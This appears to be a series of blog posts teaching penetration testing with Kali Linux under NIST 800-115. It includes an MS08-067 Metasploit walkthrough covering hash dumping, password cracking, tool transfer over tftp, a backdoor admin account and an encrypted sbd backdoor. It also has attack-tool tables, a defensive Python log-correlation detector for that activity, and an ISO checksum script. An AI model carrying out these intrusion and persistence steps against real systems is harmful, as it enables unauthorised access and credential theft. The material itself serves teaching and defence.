<img alt="theharvester9" src="http://blog.terraverdeservices.com/hs-fs/hub/319268/file-2562398189-png/Blog_Images/theharvester9.png?t=1440522756112&width=600" style="display: block; margin-left: auto; margin-right: auto; width: 600px;" width="600" /><br />
We have come to the end of this phase of Discovery. We now have
enough information to begin the attack phase of our penetration test
against our target environment.<br />
<h3>
Attack</h3>
<h3>
Gaining Access</h3>
Now that we have identified several vulnerabilities as well as the
likelihood of exploitation we decide to try and exploit the MS08-067
vulnerability identified with our nmap scan. We leverage the Metasploit
framework to begin our initial attack vector.<br />
Metasploit is very powerful and could be used for various phases
within our methodology. That being said Kali provides many options that
can be leveraged to meet our testing objectives. In this particular case
Metasploit provides a perfect vehicle to exploit this particular
vulnerability.<br />
Prior to launching Metasploit we need to start up the Postgres
database and the Metasploit server component. These are not configured
to start on boot by default in Kali.<br />
<img alt="attack1" src="http://blog.terraverdeservices.com/hs-fs/hub/319268/file-2558401497-png/Blog_Images/attack1.png?t=1440522756112&width=589" style="display: block; margin-left: auto; margin-right: auto; width: 589px;" width="589" /><br />
Next, we launch Metasploit console with the msfconsole command. After
doing an initial search we discover that Metasploit does have an
exploit for MS08-067. We configure the exploit with the bind shell
Meterpreter payload to make us work a bit harder for our objectives.
Once all the options are configured we run the exploit using the exploit
command.<br />
<img alt="attack2" src="http://blog.terraverdeservices.com/hs-fs/hub/319268/file-2558406582-png/Blog_Images/attack2.png?t=1440522756112&width=589" style="display: block; margin-left: auto; margin-right: auto; width: 589px;" width="589" /><br />
Success! We have exploited our vulnerability and have gained access to our system.<br />
<h3>
System Browsing</h3>
Now we'd like to validate our access as well as upload additional tools to gather information and launch further attacks.<br />
<img alt="attack3" src="http://blog.terraverdeservices.com/hs-fs/hub/319268/file-2558401492-png/Blog_Images/attack3.png?t=1440522756112&width=588" style="display: block; margin-left: auto; margin-right: auto; width: 588px;" width="588" /><br />
After confirming that we are running as SYSTEM, we decide that
we should dump hashes in order to help with attacks against other
systems.<br />
<img alt="attack4" src="http://blog.terraverdeservices.com/hs-fs/hub/319268/file-2558406537-png/Blog_Images/attack4.png?t=1440522756112&width=589" style="display: block; margin-left: auto; margin-right: auto; width: 589px;" width="589" /><br />
Once we have the hashes we can launch John on our Kali system to
crack the administrator password. On many networks the administrator
account password will be the same across all systems or groups of
systems so this will come in handy as we continue to exploit our target
network.<br />
<img alt="attack5" src="http://blog.terraverdeservices.com/hs-fs/hub/319268/file-2558406542-png/Blog_Images/attack5.png?t=1440522756112&width=589" style="display: block; margin-left: auto; margin-right: auto; width: 589px;" width="589" /><br />
<h3>
Installing Additional Tools</h3>
Once we dump hashes we decide to upload some additional tools to
pivot and launch attacks from our compromised host. While we could
download our tool-kits using Meterpreter we wanted to demonstrate a
couple of additional ways to upload tools to our exploited host. In
order to continue we drop into a shell.<br />
<img alt="meter1" src="http://blog.terraverdeservices.com/hs-fs/hub/319268/file-2558406612-png/Blog_Images/meter1.png?t=1440522756112&width=589" style="display: block; margin-left: auto; margin-right: auto; width: 589px;" width="589" /><br />
We decide to leverage Windows tftp.exe client to upload our tool-set.
We first need to start the tftp daemon on our Kali instance. In order
to do this we ran:<br />
<img alt="meter2" src="http://blog.terraverdeservices.com/hs-fs/hub/319268/file-2558401517-png/Blog_Images/meter2.png?t=1440522756112&width=588" style="display: block; margin-left: auto; margin-right: auto; width: 588px;" width="588" /><br />
Once our tftp server was started we downloaded sbd.exe and created
an administrator account, so we can get back into our target in the
future.<br />
<img alt="meter3" src="http://blog.terraverdeservices.com/hs-fs/hub/319268/file-2558406572-png/Blog_Images/meter3.png?t=1440522756112&width=589" style="display: block; margin-left: auto; margin-right: auto; width: 589px;" width="589" /><br />
Next, we launch our backdoor using sbd.exe. Sbd is very similar to
Netcat however it allows us to encrypt our data channel with a shared
secret.<br />
<img alt="meter4" src="http://blog.terraverdeservices.com/hs-fs/hub/319268/file-2558406607-png/Blog_Images/meter4.png?t=1440522756112&width=587" style="display: block; margin-left: auto; margin-right: auto; width: 587px;" width="587" /><br />
We then connect with the sbd client on our Kali machine.<br />
<img alt="meter5" src="http://blog.terraverdeservices.com/hs-fs/hub/319268/file-2558401522-png/Blog_Images/meter5.png?t=1440522756112&width=589" style="display: block; margin-left: auto; margin-right: auto; width: 589px;" width="589" /><br />
Using this backdoor we can repeat our Discovery process to identify
additional hosts or networks and vulnerabilities. We can also use this
access to pivot and launch attacks until our objectives are met.<br />
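The tool transfer and account creation described above leave records that a defender can correlate. The following is an added example, not part of the original article: it flags a new local account that is placed in Administrators shortly after tftp.exe runs on the same host. It assumes Security-log event IDs 4688, 4720 and 4732 (Windows Vista/Server 2008 and later, with process-creation auditing enabled); the records, host names, SIDs and the 30-minute window are constructed.<br />

```python
from datetime import datetime, timedelta
import ntpath

ADMINISTRATORS_SID = "S-1-5-32-544"   # well-known SID of the local Administrators group
WINDOW = timedelta(minutes=30)        # assumed correlation window

# Constructed, simplified Security-log records (already parsed into dicts).
SID = "S-1-5-21-1111111111-2222222222-3333333333-"
EVENTS = [
    {"time": "2015-08-25T10:02:11", "host": "WS01", "id": 4688,
     "NewProcessName": r"C:\WINDOWS\system32\cmd.exe", "SubjectUserName": "WS01$"},
    {"time": "2015-08-25T10:03:40", "host": "WS01", "id": 4688,
     "NewProcessName": r"C:\WINDOWS\system32\tftp.exe", "SubjectUserName": "WS01$"},
    {"time": "2015-08-25T10:05:02", "host": "WS01", "id": 4720,
     "TargetUserName": "support2", "TargetSid": SID + "1005"},
    {"time": "2015-08-25T10:05:09", "host": "WS01", "id": 4732,
     "MemberSid": SID + "1005", "TargetSid": ADMINISTRATORS_SID},
    # WS02: new account added to Users only, so nothing to report.
    {"time": "2015-08-25T11:00:00", "host": "WS02", "id": 4720,
     "TargetUserName": "intern1", "TargetSid": SID + "1010"},
    {"time": "2015-08-25T11:00:05", "host": "WS02", "id": 4732,
     "MemberSid": SID + "1010", "TargetSid": "S-1-5-32-545"},
    # WS03: new administrator, but no tftp.exe beforehand.
    {"time": "2015-08-25T12:15:00", "host": "WS03", "id": 4720,
     "TargetUserName": "svc-backup", "TargetSid": SID + "1007"},
    {"time": "2015-08-25T12:15:30", "host": "WS03", "id": 4732,
     "MemberSid": SID + "1007", "TargetSid": ADMINISTRATORS_SID},
]


def correlate(events):
    """Return alerts for accounts created and made local admin within WINDOW.

    Severity is "high" when tftp.exe ran on the same host at most WINDOW
    before the account was created, otherwise "medium".
    """
    alerts = []
    state = {}  # per host: time of last tftp.exe run, accounts created so far
    for ev in sorted(events, key=lambda e: e["time"]):
        when = datetime.fromisoformat(ev["time"])
        host = state.setdefault(ev["host"], {"tftp": None, "created": {}})

        if ev["id"] == 4688:  # process creation
            image = ntpath.basename(ev.get("NewProcessName", "")).lower()
            if image == "tftp.exe":
                host["tftp"] = when

        elif ev["id"] == 4720:  # user account created
            host["created"][ev["TargetSid"]] = (ev["TargetUserName"], when)

        elif ev["id"] == 4732 and ev.get("TargetSid") == ADMINISTRATORS_SID:
            created = host["created"].get(ev.get("MemberSid"))
            if created is None or when - created[1] > WINDOW:
                continue  # promotion of an older account: outside this rule
            name, created_at = created
            tftp = host["tftp"]
            after_transfer = (tftp is not None
                              and timedelta(0) <= created_at - tftp <= WINDOW)
            alerts.append({
                "host": ev["host"],
                "account": name,
                "time": ev["time"],
                "severity": "high" if after_transfer else "medium",
                "reason": ("new local administrator after tftp.exe execution"
                           if after_transfer else "new local administrator"),
            })
    return alerts


if __name__ == "__main__":
    for alert in correlate(EVENTS):
        print(alert)
```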
<h3>
Reporting</h3>
Documentation is critical to the success of the penetration test.
This can be performed through screen-shots or tool output. Since we are
using Dradis we ensure that we output all tools to text or XML files as
well as take screen-shots where tool output is less efficient.<br />
Some tools provide self-documenting features. Take Metasploit for
instance. It provides a database that captures output from various tools
as you progress through your penetration test. In addition, Meterpreter
has the screenshot feature that allows us to take a screen capture of
the victim's desktop. Here is a screenshot from our previously
compromised host.<br />
<img alt="meter6" src="http://blog.terraverdeservices.com/hs-fs/hub/319268/file-2562428264-png/Blog_Images/meter6.png?t=1440522756112&width=590" style="display: block; margin-left: auto; margin-right: auto; width: 590px;" width="590" /><br />
Once this data is input or imported into Dradis we can output reports
in HTML and Word documents. The screen shot below should give you the
idea.<br />
<img alt="kali1" src="http://blog.terraverdeservices.com/hs-fs/hub/319268/file-2562428274-png/Blog_Images/kali1.png?t=1440522756112&width=589" style="display: block; margin-left: auto; margin-right: auto; width: 589px;" width="589" /><br />
<h3>
Conclusion</h3>
Kali is a valuable resource when performing penetration testing.
Sometimes the tools can seem a bit overwhelming. Leveraging a
methodology such as NIST 800-115 will bring some consistency and
continuity to your penetration tests.<br />
While we did not cover every tool on the distribution nor demonstrate
all mapped tools in our example, we hope this brief introduction will
help you formulate a plan of attack when using Kali for penetration
testing.</div>
BlackBarbie-bbhttp://www.blogger.com/profile/03407685720956138113noreply@blogger.com5tag:blogger.com,1999:blog-4509349481580895365.post-10526071130125620702015-08-27T09:59:00.001+05:302015-08-27T09:59:59.796+05:30Pentesting Methodology Tutorial part 2<div dir="ltr" style="text-align: left;" trbidi="on">
Hi friends,<br />
<br />
Welcome to the second part of the methodology plan:<br />
<br />
<h3>
Attack</h3>
If you have done your homework during the Discovery phase then
hopefully the initial part of the Attack phase will go smoothly and
successfully. In this section we are going to map all the Kali tools to
the different parts of the Attack phase of NIST 800-115.<br />
Here is a summary of the Attack phase and its various parts. Keep in
mind that we will continue to revisit the Discovery phase throughout the
course of the penetration test.<br />
<h3>
<b>Gaining Access</b></h3>
Kali has several tools that can assist with gaining access to systems
and networks. Most people, including us, will immediately launch
Metasploit; however, there are several other tool-sets that can be
leveraged. To make things a bit more straightforward we have broken
these tool-sets out based on various attack vectors.<br />
<h3>
Password Attacks</h3>
<table border=".5">
<tbody>
<tr>
<td><span style="color: #f58220;"><i><b>Tool/Capability</b></i></span></td>
<td><span style="color: #f58220;"><i><b>Description</b></i></span></td>
</tr>
<tr>
<td>Hydra/gtk-hydra</td>
<td>Network logon cracker which supports many different services.</td>
</tr>
<tr>
<td>Dbpwaudit</td>
<td>Is a Java tool that allows you to perform online audits of password quality for several database engines.</td>
</tr>
<tr>
<td>Cisco-audit-tool</td>
<td>Script which scans Cisco routers for common vulnerabilities</td>
</tr>
<tr>
<td>Onesixtyone</td>
<td>Is an SNMP scanner which utilizes a sweep technique to achieve very high performance.</td>
</tr>
<tr>
<td>Acccheck</td>
<td>Script for checking default logins on Windows.</td>
</tr>
<tr>
<td>John</td>
<td>Offline dictionary and brute-force cracking tool.</td>
</tr>
<tr>
<td>Ophcrack</td>
<td>Is a Windows Password cracker based on Rainbow Tables.</td>
</tr>
</tbody>
</table>
<br />
<h3>
Vulnerability Exploitation</h3>
<table border=".5">
<tbody>
<tr>
<td><span style="color: #f58220;"><i><b>Tool/Capability</b></i></span></td>
<td><span style="color: #f58220;"><i><b>Description</b></i></span></td>
</tr>
<tr>
<td>Metasploit</td>
<td>Penetration testing and exploitation framework.</td>
</tr>
<tr>
<td>Searchsploit</td>
<td>Script used to search Exploit-DB exploits.</td>
</tr>
<tr>
<td>Social Engineering Toolkit</td>
<td>An open-source Python-driven tool aimed at penetration testing around Social-Engineering.</td>
</tr>
</tbody>
</table>
<br />
<h3>
Wireless Attacks</h3>
<table border=".5">
<tbody>
<tr>
<td><span style="color: #f58220;"><i><b>Kali Tool /</b></i></span><span style="color: #f58220;"><i><b>Capability</b></i></span></td>
<td><span style="color: #f58220;"><i><b>Description</b></i></span></td>
</tr>
<tr>
<td>Aircrack-ng</td>
<td>A 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured.</td>
</tr>
<tr>
<td>Fern</td>
<td>A wireless security auditing and attack software program written
using the Python Programming Language and the Python Qt GUI library. The
program is able to crack and recover WEP/WPA/WPS keys and also run
other network based attacks on wireless or ethernet based networks.</td>
</tr>
</tbody>
</table>
<br />
<h3>
Web Attacks</h3>
<table border=".5">
<tbody>
<tr>
<td><span style="color: #f58220;"><i><b>Tool/Capability</b></i></span></td>
<td><span style="color: #f58220;"><i><b>Description</b></i></span></td>
</tr>
<tr>
<td>Browser Exploitation Framework (BeEF)</td>
<td>A penetration testing tool that focuses on the web browser.</td>
</tr>
<tr>
<td>Sqlninja</td>
<td>A tool targeted to exploit SQL Injection vulnerabilities on a web application that uses Microsoft SQL Server as its back-end.</td>
</tr>
<tr>
<td>Bbqsql</td>
<td>SQL injection exploitation tool.</td>
</tr>
</tbody>
</table>
<br />
<h3>
<b>Escalating Privilege</b></h3>
Once we have gained user level access to a system, 9 times out of 10
we want to escalate our privilege to gather more sensitive information
such as passwords or restricted data. We will usually perform some of
the same Discovery phase processes in order to identify and exploit
additional vulnerabilities. You will notice that we have repeated
several tools from previous tables; however, we have provided some
additional descriptions that are more relevant to this phase of the
process.<br />
<table border=".5">
<tbody>
<tr>
<td><span style="color: #f58220;"><i><b>Tool/Capability</b></i></span></td>
<td><span style="color: #f58220;"><i><b>Description</b></i></span></td>
</tr>
<tr>
<td>Unix-privesc-check</td>
<td>Unix-privesc-checker is a script that runs on Unix systems (tested on
Solaris 9, HPUX 11, Various Linuxes, FreeBSD 6.2). It tries to find
misconfigurations that could allow local unprivileged users to escalate
privileges to other users or to access local apps (e.g. databases).</td>
</tr>
<tr>
<td>lynis</td>
<td>An auditing tool for Unix (specialists). It scans the system and available software, to detect security issues.</td>
</tr>
<tr>
<td>enum4linux</td>
<td>A tool for enumerating information from Windows and Samba systems.</td>
</tr>
<tr>
<td>Metasploit</td>
<td>Penetration testing and exploitation framework. Metasploit has several modules that can assist with privilege escalation.</td>
</tr>
<tr>
<td>Searchsploit</td>
<td>Script used to search Exploit-DB for local privilege escalation exploits.</td>
</tr>
</tbody>
</table>
<br />
<h3>
<b>System Browsing</b></h3>
<table border=".5">
<tbody>
<tr>
<td><span style="color: #f58220;"><i><b>Tool/Capability</b></i></span></td>
<td><span style="color: #f58220;"><i><b>Description</b></i></span></td>
</tr>
<tr>
<td>windows-binaries</td>
<td>Folder in Kali with multiple windows exploits and binaries.</td>
</tr>
<tr>
<td>Sbd.exe</td>
<td>An encrypted version of netcat.</td>
</tr>
<tr>
<td>nc.exe</td>
<td>Netcat is a computer networking service for reading from and writing
to network connections using TCP or UDP. Netcat is designed to be a
dependable "back-end" device that can be used directly or easily driven
by other programs and scripts. At the same time, it is a feature-rich
network debugging and investigation tool, since it can produce almost
any kind of correlation you would need and has a number of built-in
capabilities.<br />
Netcat is often referred to as a "Swiss-army knife for TCP/IP". Its
list of features includes port scanning, transferring files, and port
listening, and it can be used as a backdoor.</td>
</tr>
<tr>
<td> Metasploit/ Meterpreter</td>
<td>Exploitation framework with additional modules to gather information once compromised.</td>
</tr>
</tbody>
</table>
<h3>
<b>Install Additional Tools</b></h3>
<table border=".5">
<tbody>
<tr>
<td><span style="color: #f58220;"><i><b>Tool/Capability</b></i></span></td>
<td><span style="color: #f58220;"><i><b>Description</b></i></span></td>
</tr>
<tr>
<td>atftpd</td>
<td>Linux TFTP daemon that can be used to upload and download files from target systems.</td>
</tr>
<tr>
<td>apache</td>
<td>Web server that can be used to deliver additional tools to compromised host.</td>
</tr>
</tbody>
</table>
<h3>
Reporting</h3>
Lastly, we need to take all the data from various tools as well as
our manual observations and screen-shots to create a report. A typical
penetration test report will have two audiences. A non-technical
audience that needs enough details to understand the problem and make
management level decisions to address the risk (think resources and
budget) and the technical audience who will be responsible for
mitigating the findings.<br />
<table border=".5"><tbody>
<tr>
<td><span style="color: #f58220;"><i><b>Tool/Capability</b></i></span></td>
<td><span style="color: #f58220;"><i><b>Description</b></i></span></td>
</tr>
<tr>
<td>Dradis</td>
<td>Open-source framework for sharing information during a penetration
test. Dradis allows you to output gathered information in HTML and Word.</td>
</tr>
<tr>
<td>MagicTree</td>
<td>MagicTree is a penetration tester productivity tool. It is designed
to allow easy and straightforward data consolidation, querying, external
command execution and (yeah!) report generation.</td></tr>
</tbody></table>
</div>
BlackBarbie-bbhttp://www.blogger.com/profile/03407685720956138113noreply@blogger.com2tag:blogger.com,1999:blog-4509349481580895365.post-8248610338936118232015-08-27T09:56:00.000+05:302015-08-27T09:56:23.122+05:30Pentesting Methodology Tutorial<div dir="ltr" style="text-align: left;" trbidi="on">
Hi Friends,<br />
<br />
Today I wish to share the pentesting methodology which I use to practice with Kali Linux:<br />
<br />
<h3>
The Methodology</h3>
We can’t begin an article about mapping Kali to a penetration testing
methodology without first selecting the methodology. When it comes to
penetration testing methodologies you can basically narrow the field
down to three. These are:<br />
<ol>
<li>Open Source Security Testing Methodology Manual (OSSTMM): Series of
standard tests designed to deliver results as verified facts that
provide actionable information in order to strengthen security
operations.</li>
<li>Penetration Testing Execution Standard (PTES): Standard for penetration testing execution along with technical guidelines.</li>
<li>National Institute of Standards and Technology: Guide to Security
Testing and Assessment (NIST 800-115): Guide for conducting technical
security assessments. Contains guidance on techniques and methods that
an assessor should use when performing an Information Security
Assessment.</li>
</ol>
While all three are good methodologies we find that PTES and NIST
800-115 provide a bit more flexibility during our penetration tests.
Also, the methodologies more closely align with what’s taught in
security course curriculum such as SANS. For this article we will be
using NIST 800-115. Both PTES and NIST are similar so it should be easy
to transition between the two. Also, the folks over at PTES have done a
fairly decent job mapping tools to the methodology.<br />
<br />
<br />
<h3>
Planning</h3>
The Planning Phase is where we begin and where we will experience our
first little roadblock. This phase is focused on tasks such as
establishing rules of engagement, objectives, task assignment, testing
management, and engagement tracking. If we break this down further we
can think in terms of project management and penetration testing
documentation.<br />
Kali provides a few tools that can be used for planning and
penetration testing documentation. Here is a quick rundown of the tools
as well as a brief description.<br />
<table border=".5" cellpadding="1" style="margin-left: auto; margin-right: auto;">
<tbody>
<tr>
<td>
<span style="color: #f58220;"><strong><em>Tool/Capability</em></strong></span><br />
</td>
<td>
<span style="color: #f58220;"><strong><em>Description</em></strong></span><br />
</td>
</tr>
<tr>
<td>
Dradis<br />
</td>
<td>
Open-source framework for sharing information during a penetration test.<br />
</td>
</tr>
<tr>
<td>
Keep-note<br />
</td>
<td>
Cross platform note taking application.<br />
</td>
</tr>
<tr>
<td>
* Redmine<br />
</td>
<td>
Open-source web-based project management tool.<br />
</td>
</tr>
</tbody>
</table>
<br />
<h3>
Discovery</h3>
The next step and one of the most important steps in the penetration
testing methodology is discovery. The interesting thing about discovery
is that it's a constant cycle during a penetration test. You are
typically re-engaging the discovery phase within the Attack process to
perform privilege escalation or pivot and attack other systems until the
objectives have been met.<br />
The discovery phase consists of two parts. The first part is
information gathering and scanning. During this part of the engagement
the team identifies as much information about the company, people,
systems, services, and applications as possible. The second part is
vulnerability analysis where the testing team synthesizes all the
information gathered in part 1 of discovery to identify vulnerabilities
and possible attack vectors. The discovery phase is one of the most
important phases that can and should be repeated as the penetration test
progresses into the Attack phase.<br />
<h3>
Information Gathering and Scanning</h3>
Kali contains many tools that can be used for information gathering
and open-source intelligence gathering (OSINT). Here is a quick
breakdown of the tools.<br />
<table border="1" cellpadding="1" style="margin-left: auto; margin-right: auto;">
<tbody>
<tr>
<td>
<span style="color: #f58220;"><em><strong>Tool/Capability</strong></em></span><br />
</td>
<td>
<span style="color: #f58220;"><em><strong>Description</strong></em></span><br />
</td>
</tr>
<tr>
<td>
Maltego<br />
</td>
<td>
Maltego is an open-source intelligence and forensics application
developed by Paterva. Maltego focuses on providing a library of
transforms for discovery of data from open sources, and visualizing that
information in a graph format, suitable for link analysis and data
mining.<br />
</td>
</tr>
<tr>
<td>
TheHarvester<br />
</td>
<td>
The objective of this program is to gather emails, subdomains, hosts,
employee names, open ports and banners from different public sources
like search engines, PGP key servers and SHODAN computer database.<br />
</td>
</tr>
<tr>
<td>
Creepy<br />
</td>
<td>
Creepy is a geolocation tool that helps social engineers perform successful information gathering.<br />
</td>
</tr>
<tr>
<td>
Dmitry<br />
</td>
<td>
Dmitry (Deepmagic Information Gathering Tool) is a UNIX/(GNU)Linux command
line application coded in C. Dmitry is used to gather information such
as sub-domains, email addresses, whois lookups, etc.<br />
</td>
</tr>
<tr>
<td>
Jigsaw<br />
</td>
<td>
Email enumeration tool that accesses the Jigsaw business directory.
Can also be used to generate email addresses using common formats.<br />
</td>
</tr>
<tr>
<td>
Metagoofil<br />
</td>
<td>
Information gathering tool designed for extracting metadata of public
documents (pdf,doc,xls,ppt,docx,pptx,xlsx) belonging to a target
company.<br />
</td>
</tr>
</tbody>
</table>
<br />
<br />
Kali has many tools we could use to meet various scanning requirements. Here is a quick table broken out by requirement type.<br />
<table border="1" cellpadding="1" style="margin-left: auto; margin-right: auto;">
<tbody>
<tr>
<td>
<span style="color: #f58220;"><strong><em>Technique</em></strong></span><br />
</td>
<td>
<span style="color: #f58220;"><strong><em>Tool/Capability</em></strong></span><br />
</td>
<td>
<span style="color: #f58220;"><strong><em>Description</em></strong></span><br />
</td>
</tr>
<tr>
<td rowspan="3">
Network Discovery<br />
</td>
<td>
Fierce.pl<br />
</td>
<td>
DNS interrogation tool. Uses several techniques including DNS zone transfers, DNS brute-force, and DNS reverse lookups.<br />
</td>
</tr>
<tr>
<td>
dnsdict6<br />
</td>
<td>
Utility used to enumerate IPv6 domains.<br />
</td>
</tr>
<tr>
<td>
Fping/fping6<br />
</td>
<td>
Ping on steroids. Has the ability to query systems via ICMP.<br />
</td>
</tr>
<tr>
<td rowspan="3">
Network Port and Service Identification<br />
</td>
<td>
dnmap<br />
</td>
<td>
Distributed nmap framework with client and server components. Map hosts, ports, and services across networks.<br />
</td>
</tr>
<tr>
<td>
nmap<br />
</td>
<td>
Map hosts, ports, and services across networks. Also, has ability to run scripts to identify vulnerabilities.<br />
</td>
</tr>
<tr>
<td>
hping3<br />
</td>
<td>
Hping3 is a network tool able to send custom TCP/IP packets and to
display target replies like ping program does with ICMP replies.<br />
</td>
</tr>
<tr>
<td rowspan="2">
Wireless Discovery / Scanning<br />
</td>
<td>
Kismet<br />
</td>
<td>
A 802.11 layer2 wireless network detector, sniffer, and intrusion detection system.<br />
</td>
</tr>
<tr>
<td>
Wireshark<br />
</td>
<td>
A network protocol analyzer for Unix and Windows.<br />
</td>
</tr>
<tr>
<td rowspan="3">
Web Application Discovery / Scanning<br />
</td>
<td>
Burpsuite<br />
</td>
<td>
An integrated platform for performing security testing of web applications.<br />
</td>
</tr>
<tr>
<td>
Webscarab<br />
</td>
<td>
A framework for analysing applications that communicate using the HTTP and HTTPS protocols.<br />
</td>
</tr>
<tr>
<td>
Nikto<br />
</td>
<td>
An Open Source (GPL) web server scanner which performs comprehensive tests against web servers<br />
</td>
</tr>
</tbody>
</table>
<br />
<h3>
Vulnerability Analysis</h3>
During vulnerability analysis we review information gathering and
scanning data to identify possible attack vectors. Typically, this
involves reviewing service and OS version information against online
vulnerability databases. We can also identify vulnerabilities through
automated tools provided by Kali.<br />
We've included a table of these tools below. Please note that we did
include additional tools that could be installed. Keep in mind that Kali
is Linux and most things that can be installed on a Linux platform will
install on Kali. It's not unusual for us to install Nessus right after
installing Kali on our primary penetration testing systems.<br />
<table border="1" cellpadding="1" style="margin-left: auto; margin-right: auto;">
<tbody>
<tr>
<td>
<span style="color: #f58220;"><strong><em>Technique</em></strong></span><br />
</td>
<td>
<span style="color: #f58220;"><strong><em>Tool/Capability</em></strong></span><br />
</td>
<td>
<span style="color: #f58220;"><strong><em>Description</em></strong></span><br />
</td>
</tr>
<tr>
<td rowspan="3">
Vulnerability Scanning<br />
</td>
<td>
nmap -sC or --script<br />
</td>
<td>
Switches used to initiate vulnerability scanning with nmap.<br />
</td>
</tr>
<tr>
<td>
OpenVAS<br />
</td>
<td>
Open-source vulnerability scanner. A fork of the Nessus project.<br />
</td>
</tr>
<tr>
<td>
*Nessus<br />
</td>
<td>
Commercial vulnerability scanner.<br />
</td>
</tr>
<tr>
<td rowspan="2">
Database Vulnerability Scanning<br />
</td>
<td>
oscanner<br />
</td>
<td>
An Oracle assessment framework developed in Java.<br />
</td>
</tr>
<tr>
<td>
Tnscmd10g<br />
</td>
<td>
Tool used to gather information from the TNS listener port.<br />
</td>
</tr>
<tr>
<td rowspan="2">
Network Vulnerability Scanning<br />
</td>
<td>
Cisco-global-exploiter<br />
</td>
<td>
Is an advanced, simple and fast security testing tool/ exploit
engine, that is able to exploit 14 vulnerabilities in disparate Cisco
devices.<br />
</td>
</tr>
<tr>
<td>
Yersinia<br />
</td>
<td>
Is a network tool designed to take advantage of some weaknesses in different network protocols.<br />
</td>
</tr>
<tr>
<td rowspan="3">
Web Vulnerability Scanning<br />
</td>
<td>
Arachni<br />
</td>
<td>
A Free/Open Source Web Application Security Scanner Framework.<br />
</td>
</tr>
<tr>
<td>
W3af<br />
</td>
<td>
Is a Web Application Attack and Audit Framework.<br />
</td>
</tr>
<tr>
<td>
Owasp-zap<br />
</td>
<td>
The Zed Attack Proxy (ZAP) is an easy to use integrated penetration
testing tool for finding vulnerabilities in web applications.<br />
</td>
</tr>
<tr>
<td rowspan="2">
Fuzzing Tools<br />
</td>
<td>
bed<br />
</td>
<td>
BED (aka Bruteforce Exploit Detector) is a plain-text protocol fuzzer
that checks software for common vulnerabilities like buffer overflows,
format string bugs, integer overflows, etc.<br />
</td>
</tr>
<tr>
<td>
spike<br />
</td>
<td>
API for fuzzer development written in C.<br />
</td>
</tr>
</tbody>
</table>
<br />
That's it for today! I will share the next part of the methodology soon. Stay tuned for updates.<br />
<br /><br />
</div>
BlackBarbie-bbhttp://www.blogger.com/profile/03407685720956138113noreply@blogger.com5tag:blogger.com,1999:blog-4509349481580895365.post-29326564883674306032015-08-27T09:50:00.000+05:302015-08-27T09:50:10.346+05:30Kali Linux Installation Tutorial<div dir="ltr" style="text-align: left;" trbidi="on">
Hi Friends,<br />
<br />
The following tutorial will guide you through installing Kali Linux on your machine:<br />
<br />
<h1 class="page-title">
Kali Linux Hard Disk Install:</h1>
<h2>
Kali Linux Installation Requirements</h2>
<div style="text-align: justify;">
Installing Kali Linux on your computer
is an easy process. First, you’ll need compatible computer hardware.
Kali is supported on i386, amd64, and ARM (both armel and armhf)
platforms. The hardware requirements are minimal as listed below,
although better hardware will naturally provide better performance. The
i386 images have a default <a href="http://en.wikipedia.org/wiki/Physical_Address_Extension" target="_blank" title="Physical Address Extension">PAE</a> kernel, so you can run them on systems with over 4GB of RAM. <a href="http://docs.kali.org/introduction/download-official-kali-linux-images" target="_blank" title="Download Official Kali Images">Download Kali Linux</a> and either burn the ISO to DVD, or<a href="http://docs.kali.org/downloading/kali-linux-live-usb-install" target="_blank" title="Kali Linux Live USB Install"> prepare a USB stick with Kali Linux Live</a> as the installation medium. If you do not have a DVD drive or USB port on your computer, check out the <a href="http://docs.kali.org/installation/kali-linux-network-pxe-install" target="_blank" title="Kali Linux Network PXE Install">Kali Linux Network Install</a>.</div>
<h4>
Installation Prerequisites</h4>
<ul>
<li style="text-align: justify;">A minimum of 10 GB disk space for the Kali Linux install.</li>
<li style="text-align: justify;">For i386 and amd64 architectures, a minimum of 512MB RAM.</li>
<li>CD-DVD Drive / USB boot support</li>
</ul>
<h3>
Preparing for the Installation</h3>
<ol>
<li><a href="http://docs.kali.org/introduction/download-official-kali-linux-images" target="_blank" title="Download Official Kali Images">Download Kali Linux</a>.</li>
<li>Burn the Kali Linux ISO to DVD or <a href="http://docs.kali.org/downloading/kali-linux-live-usb-install" target="_blank" title="Kali Linux Live USB Install">image Kali Linux Live to USB</a>.</li>
<li>Ensure that your computer is set to boot from CD / USB in your BIOS.</li>
</ol>
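<div style="text-align: justify;">
Between downloading the image and writing it to DVD or USB, confirm the ISO is the file that was published. The script below is an added example, not part of the original tutorial: it checks an ISO against a checksum list in <code>sha256sum</code> format. The file names are hypothetical, and it assumes you obtained the checksum list from the official download page over a trusted channel.</div>

```shell
#!/bin/sh
# Added example: verify a downloaded ISO against a checksum list before
# writing it to installation media. File names are hypothetical.

# verify_iso ISO SUMS_FILE
#   SUMS_FILE lines look like "<64 hex digits>  <filename>" (sha256sum format).
#   Exit status: 0 = digest matches, 1 = mismatch, 2 = could not be checked.
#   The ( ... ) body runs in a subshell, so variables stay local and
#   `exit` only leaves the function.
verify_iso() (
    iso="$1"
    sums="$2"

    [ -r "$iso" ] && [ -r "$sums" ] || { echo "missing input file" >&2; exit 2; }
    name="${iso##*/}"            # compare on the bare file name, not the path

    # Pick the entry whose filename field is exactly this image.
    # sha256sum prefixes the name with '*' in binary mode; strip it.
    # (Assumes the image name contains no spaces.)
    expected=$(awk -v n="$name" '{ f = $2; sub(/^\*/, "", f) }
                                 f == n { print tolower($1); exit }' "$sums")
    if ! printf '%s' "$expected" | grep -Eq '^[0-9a-f]{64}$'; then
        echo "no valid SHA-256 entry for $name in $sums" >&2
        exit 2
    fi

    actual=$(sha256sum < "$iso" | awk '{ print $1 }')
    if [ "$actual" = "$expected" ]; then
        echo "OK: $name matches the published checksum"
        exit 0
    fi
    echo "MISMATCH: $name (do not write this image to media)" >&2
    echo "  expected $expected" >&2
    echo "  actual   $actual" >&2
    exit 1
)

# Command-line use:  ./verify_iso.sh <image.iso> <SHA256SUMS>
if [ "$#" -eq 2 ]; then
    verify_iso "$1" "$2"
fi
```

A status of 2 means the image was never actually checked (missing file or no entry for that name), so treat it the same as a failure rather than as a pass.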
<h3>
Kali Linux Installation Procedure</h3>
<ol>
<li>To start your installation, boot with your chosen installation
medium. You should be greeted with the Kali Boot screen. Choose either <em>Graphical</em> or <em>Text-Mode</em> install. In this example, we chose a GUI install. <br clear="none" /> <br clear="none" /><a href="http://docs.kali.org/wp-content/uploads/2015/02/01-install-select.png"><img alt="01-install-select" class="alignnone size-full wp-image-5762" height="482" src="http://docs.kali.org/wp-content/uploads/2015/02/01-install-select.png" width="642" /></a></li>
<li>Select your preferred language and then your country location.
You’ll also be prompted to configure your keyboard with the appropriate
